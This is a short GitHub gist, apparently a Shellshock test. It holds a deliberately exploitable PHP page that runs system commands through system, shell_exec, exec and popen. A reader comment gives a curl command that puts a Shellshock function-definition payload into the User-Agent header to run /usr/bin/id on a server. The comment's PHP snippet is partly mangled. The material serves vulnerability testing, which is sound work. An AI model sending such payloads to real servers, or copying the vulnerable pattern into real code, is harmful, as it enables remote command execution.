Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Nächster Versuch, ein exploitable PHP zu schreiben.
<?php header("Content-Type: text/plain");?>
system("/usr/bin/id") => <?php system("/usr/bin/id"); ?>
shell_exec("/bin/hostname") => <?php echo shell_exec("/bin/hostname"); ?>
shell_exec("/bin/bash -c /bin/date") => <?php echo shell_exec("/bin/bash -c /bin/date"); ?>
exec("/usr/bin/whoami") => <?php echo exec("/usr/bin/whoami"); ?>
popen... => <?php
flush();
$fp = popen('/usr/bin/head /etc/issue 2>&1', "r");
while(!feof($fp))
{
// send the current file part to the browser
print fread($fp, 1024);
// flush the content to the browser
flush();
}
fclose($fp);
?>
shell_exec mit HTTP_USER_AGENT =>
<?php
echo shell_exec("HTTP_USER_AGENT(){ /usr/bin/id; }; HTTP_USER_AGENT");
?>
done;
@xambroz

This comment has been minimized.

Copy link

commented Sep 29, 2014

You need to export some variable as a environment variable for the shell to be executed.
This is my example of vulnerable php code:

/';"); ?>

This vulnerable code can be exploited by setting the user agent to something nasty like:
curl --user-agent '() { ignored;} ; /usr/bin/id ;' http://example.com/serverinfo.php

Michal Ambroz

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.